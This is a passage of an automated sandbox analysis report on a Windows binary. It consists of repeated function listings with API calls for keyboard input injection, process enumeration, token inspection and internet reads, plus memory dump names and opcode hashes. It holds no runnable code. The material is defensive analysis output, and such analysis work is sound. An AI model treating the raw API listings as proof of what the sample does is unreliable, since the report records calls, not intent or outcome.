                                                                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0013AB88
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                                                                          • Opcode ID: 9d5f39b3a9a2fb5aded015cbf5f8e5ace1b3cf5b4ab6e6221f308131b0ef5004
                                                                                                                                                                                                                                          • Instruction ID: 0669eb1cfe5f57511867cccbb5350bc985a12e1e8e2893d4e1d90cd4bc895150
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d5f39b3a9a2fb5aded015cbf5f8e5ace1b3cf5b4ab6e6221f308131b0ef5004
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE313931A40248AEFF35CB64CC05BFABBAAAF54320F84421AF5C1961D5D3749981C7A3
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001652C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00165352
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00165375
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00165382
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001653A8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3340791633-0
                                                                                                                                                                                                                                          • Opcode ID: d90ce61ea51feae1d42d489e390247e8bb5c610d1252a3bef3de58e24b3512f9
                                                                                                                                                                                                                                          • Instruction ID: 499f4836be65eaf967dc59d46b9308b88b5bdb4c92fbd84215d5b2ccf7388e4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d90ce61ea51feae1d42d489e390247e8bb5c610d1252a3bef3de58e24b3512f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2131CE34A55A08EFEB349E14CC16BE93767BB05BD0F584102FA51963E1C7F0A9A0DB82
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00167674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 0016769A
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00167710
                                                                                                                                                                                                                                          • PtInRect.USER32(?,?,00168B89), ref: 00167720
                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 0016778C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                                                                                          • Opcode ID: 570d4c8f3f7df1d11e4318d0898105ab1dff149ee743b3057e6e330ad3e1ffb0
                                                                                                                                                                                                                                          • Instruction ID: 7f7a3df63dd517dc90a7209572da90521801241e2540ed6672907d770c2b2dfd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 570d4c8f3f7df1d11e4318d0898105ab1dff149ee743b3057e6e330ad3e1ffb0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC419D38A05254EFDB01CF58CC98EA9B7F5FF49318F1581A9E8159B2A1D730E991CF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001616DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001616EB
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00133A57
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetCurrentThreadId.KERNEL32 ref: 00133A5E
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001325B3), ref: 00133A65
                                                                                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 001616FF
                                                                                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 0016174C
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00161752
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                                                                                                          • Opcode ID: 475c51528e915537863cff8e7b51c9cbb3d97c70a3bc2bfadb4b32d70f92568b
                                                                                                                                                                                                                                          • Instruction ID: 64bf92cebf3966d47ff79c2978209615eb6a76ff5ade8950efeab1b40b936b7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 475c51528e915537863cff8e7b51c9cbb3d97c70a3bc2bfadb4b32d70f92568b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C315071D00249AFD700EFA9C881CEEBBF9EF48304B5480AAE455E7312E7719E45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013DF95 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013DFCB
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013DFE2
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013E00D
                                                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0013E018
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3763101759-0
                                                                                                                                                                                                                                          • Opcode ID: 05febb6bfdd35da05666fb7a677a1a6606b63472833dce20e36f55fc95bf9da4
                                                                                                                                                                                                                                          • Instruction ID: 75599bbfc0534507ea393ed0a348366297e80c766e874181a7fd4e9166d96857
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05febb6bfdd35da05666fb7a677a1a6606b63472833dce20e36f55fc95bf9da4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4217175A00314AFCB109FA8D981BBEB7F8EF45750F154069F905BB286D7709E41CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0013D501
                                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0013D50F
                                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0013D52F
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0013D5DC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                                                                                          • Opcode ID: 6ce9e994359e7c72beeef3428b195e8dbfd3bd76db7c5df609b270c84ea2fb76
                                                                                                                                                                                                                                          • Instruction ID: c749876049b02efca58fc43e3520e83c541801dfc18ca6854c13accd7e567bb2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ce9e994359e7c72beeef3428b195e8dbfd3bd76db7c5df609b270c84ea2fb76
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 883181711083019FD301EF54EC81AAFBBF8EF99354F54052DF581862A2EB719949CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00168FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00169001
                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00127711,?,?,?,?,?), ref: 00169016
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0016905E
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00127711,?,?,?), ref: 00169094
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2864067406-0
                                                                                                                                                                                                                                          • Opcode ID: 1607d3a388b65d9668785265e7304b39abd58f7827b4c99deb6ec940980376a5
                                                                                                                                                                                                                                          • Instruction ID: 9b8e6abccc47f280026891bf200bb1f42b8e13dda182f1778092cd8c0edc1efb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1607d3a388b65d9668785265e7304b39abd58f7827b4c99deb6ec940980376a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A219C35601018FFCF258F94CC58EFA7BBDEB8A360F144169F9059B261C37199A0DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,0016CB68), ref: 0013D2FB
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0013D30A
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0013D319
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0016CB68), ref: 0013D376
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2267087916-0
                                                                                                                                                                                                                                          • Opcode ID: a67f251765668055807be1dd066809e5ef72f12dbb59d19b1869d8ed7cb4f2de
                                                                                                                                                                                                                                          • Instruction ID: 0734cd4d64e965dd14ffc400fadd7d59ce300610ef3b49a91bf89e0d95785d33
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a67f251765668055807be1dd066809e5ef72f12dbb59d19b1869d8ed7cb4f2de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A213DB05093019FC710DF28E8819AA7BE4FF56764F504A1EF499C72A2DB319D49CB93
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00131014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0013102A
                                                                                                                                                                                                                                            • Part of subcall function 00131014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00131036
                                                                                                                                                                                                                                            • Part of subcall function 00131014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00131045
                                                                                                                                                                                                                                            • Part of subcall function 00131014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0013104C
                                                                                                                                                                                                                                            • Part of subcall function 00131014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00131062
                                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001315BE
                                                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 001315E1
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00131617
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0013161E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1592001646-0
                                                                                                                                                                                                                                          • Opcode ID: 0bc034fed977c59a36c755c2272c28f7fd2c0292727767d784ceb64adc5e7238
                                                                                                                                                                                                                                          • Instruction ID: bb14150afaeb06f5c36d0c40f32e0b5c0fd3c567dcb490fae8e028bfd420dee4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc034fed977c59a36c755c2272c28f7fd2c0292727767d784ceb64adc5e7238
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3218971E00109FFDF00DFA5C945BEEB7B8EF45344F088469E445AB241E7B0AA45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00162782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0016280A
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00162824
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00162832
                                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00162840
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                                                                                                          • Opcode ID: 7dc473bc99789c9d14bab8c37ea6dd0620efcb765a8b28541d7f088816035b54
                                                                                                                                                                                                                                          • Instruction ID: 3cc1ed8995cc63da52e9d385b1bb18634d27a0485afca40c3f00aed07b398c09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dc473bc99789c9d14bab8c37ea6dd0620efcb765a8b28541d7f088816035b54
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3821F131305911AFD7149B24CC44FAA7B99AF55324F148159F4268B6E2C7B1FC82C7D0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0014CE89
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0014CEEA
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 0014CEFE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 234945975-0
                                                                                                                                                                                                                                          • Opcode ID: 3fc7c2f407cd6f75202cf54642fd646f0ae45f675257da1036b5b0af3a8066e0
                                                                                                                                                                                                                                          • Instruction ID: 987bc96a36d233c257f850ba23cbcad1de3eeefaa3f550b385a01a9427efa0f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fc7c2f407cd6f75202cf54642fd646f0ae45f675257da1036b5b0af3a8066e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F21CFB15013059BDB60DFA5C948BA77BFCEB40354F10442EE646E2561E774EE489BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001378F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00138D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0013790A,?,000000FF,?,00138754,00000000,?,0000001C,?,?), ref: 00138D8C
                                                                                                                                                                                                                                            • Part of subcall function 00138D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00138DB2
                                                                                                                                                                                                                                            • Part of subcall function 00138D7D: lstrcmpiW.KERNEL32(00000000,?,0013790A,?,000000FF,?,00138754,00000000,?,0000001C,?,?), ref: 00138DE3
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00138754,00000000,?,0000001C,?,?,00000000), ref: 00137923
                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00137949
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00138754,00000000,?,0000001C,?,?,00000000), ref: 00137984
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
